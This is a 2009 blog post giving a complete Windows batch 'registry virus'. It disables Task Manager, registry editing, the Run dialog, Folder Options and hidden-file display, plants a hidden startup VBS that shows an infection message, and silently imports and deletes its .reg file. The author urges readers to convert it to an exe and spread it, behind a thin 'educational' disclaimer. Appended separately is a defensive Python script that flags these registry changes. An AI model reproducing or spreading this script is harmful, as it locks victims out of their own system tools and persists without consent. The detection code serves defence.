Wednesday, July 1, 2009

Registry Virus



Most virus programmers disable some Windows features through the registry, such as Task Manager and the Run dialog.
Let's take a look at how they do all this.
Here I'm making a bat file that does all of it; a bat file is easy to convert to an exe using a bat-to-exe converter.
This bat file disables Run, registry editing, Task Manager, Folder Options, and the display of hidden files/folders.
It also produces an error message every time the system restarts, like "Your system infected".
=======================================================================
ECHO REGEDIT4 > %WINDIR%\DXM.REG
echo. >> %WINDIR%\DXM.reg

echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] >> %WINDIR%\DXM.reg
echo "CheckedValue"=dword:0 >> %WINDIR%\DXM.reg

echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] >> %WINDIR%\DXM.reg
echo "CheckedValue"=dword:0 >> %WINDIR%\DXM.reg

echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableTaskMgr"=dword:1 >> %WINDIR%\DXM.reg

echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableTaskMgr"=dword:1 >> %WINDIR%\DXM.reg

echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableRegistryTools"=dword:1 >> %WINDIR%\DXM.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %WINDIR%\DXM.reg
echo "dxmv"="dxm.vbs" >> %WINDIR%\DXM.reg

echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoRun"=dword:1 >> %WINDIR%\DXM.reg

echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoRun"=dword:1 >> %WINDIR%\DXM.reg

echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoFolderOptions"=dword:1 >> %WINDIR%\DXM.reg

echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoFolderOptions"=dword:0 >> %WINDIR%\DXM.reg

echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion] >> %WINDIR%\DXM.reg
echo "RegisteredOwner"="Mr. AkhilDas” >> %WINDIR%\DXM.reg
echo "RegisteredOrganization"="«« AkhlD™ »»" >> %WINDIR%\DXM.reg

echo. >> %WINDIR%\dxm.vbs
echo dxm=msgbox("Your system infected by «« AkhlD™ »» virus ",16,"iam_kingston@iamcrazy.in") >> %windir%\dxm.vbs

attrib +h +s +r %WINDIR%\dxm.vbs

start /w regedit /s %WINDIR%\DXM.reg
del %WINDIR%\DXM.reg

==========================================================================
This script creates a DXM.reg file in the Windows directory and also creates a dxm.vbs file there.
Importing DXM.reg disables all of the functions listed above and adds dxm.vbs to startup through the Run key.
Now convert it to an exe file……spread it all around You!.....Enjoy ! [;)]

For Educational Purpose Only !
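
A defender can triage a dropped .reg file or a registry export for the changes this script makes. The following is an added example, not part of the original post: it assumes the file is already decoded to text, the sample input is constructed from the values shown above plus a hypothetical benign "Updater" entry, and the Run-key script check is a heuristic.

```python
import re

# Policy values from the post that lock the user out when set to 1.
LOCKOUT = {"disabletaskmgr", "disableregistrytools", "norun", "nofolderoptions"}
POLICY_KEYS = (r"\policies\system", r"\policies\explorer")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.*)$')

# Constructed sample: .reg text as the script above would write it, plus a benign entry.
SAMPLE = r'''REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:1
"DisableRegistryTools"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFolderOptions"=dword:0
"NoRun"=dword:1
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:0
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"dxmv"="dxm.vbs"
"Updater"="\"C:\\Program Files\\Vendor\\updater.exe\""
'''

def parse_reg(text):
    """Yield (key, value_name, data) triples from .reg file text."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and (m := VALUE_RE.match(line)):
            yield key, m["name"], m["data"].strip()

def dword(data):
    """Return the integer behind 'dword:<hex>' data, or None for other types."""
    m = re.fullmatch(r"dword:([0-9a-f]{1,8})", data, re.I)
    return int(m[1], 16) if m else None

def find_tampering(text):
    """Return (reason, key, value_name, data) for each suspicious setting."""
    findings = []
    for key, name, data in parse_reg(text):
        k, n = key.lower(), name.lower()
        if k.endswith(POLICY_KEYS) and n in LOCKOUT and dword(data) == 1:
            findings.append(("tool-lockout policy", key, name, data))
        elif k.endswith(r"\folder\hidden\showall") and n == "checkedvalue" and dword(data) == 0:
            findings.append(("hidden-file display disabled", key, name, data))
        elif k.endswith(r"\currentversion\run") and re.search(r'\.(vbs|vbe|js|bat|cmd)[\\"]*$', data, re.I):
            findings.append(("script in Run key", key, name, data))
    return findings
```

Each finding names the key and value to reset or delete during cleanup; a lockout value set to 0, like the HKLM `NoFolderOptions` line, is not reported.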

1 comments:

Anonymous said...

I can't believe it works
